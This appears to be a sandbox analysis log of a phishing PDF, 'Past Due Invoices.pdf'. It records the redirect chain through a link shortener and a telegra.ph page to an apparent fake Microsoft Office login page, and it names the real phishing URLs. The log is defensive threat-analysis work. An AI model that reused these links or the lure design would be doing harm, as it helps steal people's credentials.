    Source: global trafficHTTP traffic detected: GET /js/jquery.selection.min.js HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/autosize.min.js HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/load-image.all.min.js?1 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_websync_?path=Past-Due-Invoice-05-13&hash=1c67ee9ce8dc79971f HTTP/1.1Host: t.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/quill.min.js?9 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/core.min.js?63 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /file/9f1d012ceb04882d3fbb6.png HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/icons.png?1 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico?1 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /file/9f1d012ceb04882d3fbb6.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: telegra.ph
    Source: global trafficHTTP traffic detected: GET /images/favicon_2x.png?1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: telegra.ph
    Source: global trafficHTTP traffic detected: GET /images/icons.png?1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: telegra.ph
    Source: global trafficHTTP traffic detected: GET /d-ad9VpM HTTP/1.1Host: lnkd.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lopi/office-RD117/ HTTP/1.1Host: karmarejoice.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.3.1/css/bootstrap.min.css HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://karmarejoice.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://karmarejoice.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /css/app.css HTTP/1.1Host: dancevida.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: dancevida.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lopi/office-RD117/images/bg.jpg HTTP/1.1Host: karmarejoice.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.net
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.net
    Source: global trafficHTTP traffic detected: GET /16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: logincdn.msauth.net
    Source: global trafficHTTP traffic detected: GET /lopi/office-RD117/images/bg.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: karmarejoice.com
    Source: unknownHTTPS traffic detected: 149.154.164.13:443 -> 192.168.2.6:49876 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.164.13:443 -> 192.168.2.6:49877 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.219.60:443 -> 192.168.2.6:49911 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.219.60:443 -> 192.168.2.6:49910 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.6:49912 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.53.43.226:443 -> 192.168.2.6:49914 version: TLS 1.2
    Source: Past Due Invoices.pdfInitial sample: https://lnkd.in/dptWHpAa
    Source: Past Due Invoices.pdfInitial sample: https://lnkd.in/dptwhpaa
    Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\Past Due Invoices.pdf
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\Desktop\Past Due Invoices.pdf
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=12571384739979517490 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12571384739979517490 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=10574597507145346706 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=17550103462985370468 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17550103462985370468 --renderer-client-id=4 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job /prefetch:1
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1527127842774311388 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1527127842774311388 --renderer-client-id=5 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation -- "https://lnkd.in/dptWHpAa
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13595751543582823336,10064474918634625774,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\Desktop\Past Due Invoices.pdfJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation -- "https://lnkd.in/dptWHpAaJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=12571384739979517490 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12571384739979517490 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=10574597507145346706 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=17550103462985370468 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17550103462985370468 --renderer-client-id=4 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job /prefetch:1Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1527127842774311388 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1527127842774311388 --renderer-client-id=5 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13595751543582823336,10064474918634625774,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIconsJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_sbxJump to behavior
    Source: classification engineClassification label: mal72.phis.winPDF@46/169@16/14
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: AcroRd32.exe, 00000001.00000000.519046066.000000000B2E3000.00000004.00000001.00020000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.491540967.000000000B2E3000.00000004.00000001.00020000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.537892253.000000000B2E3000.00000004.00000001.00020000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.504865833.000000000B2E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IPMMessage (ID INTEGER PRIMARY KEY, Title VARCHAR(50), Content VARCH00), ExternalLink VARCHAR(60), AcceptString VARCHAR(20), RejectString VARCHAR(20), StartDate DATE, ExpiryDate DATE, LastModifiedDate DATE, Priority INTEGER, DisplayLocation INTEGER, Context INTEGER, PairID INTEGER, MinProductVersion VARCHAR(15), MaxProductVersion VARCHAR(15),;
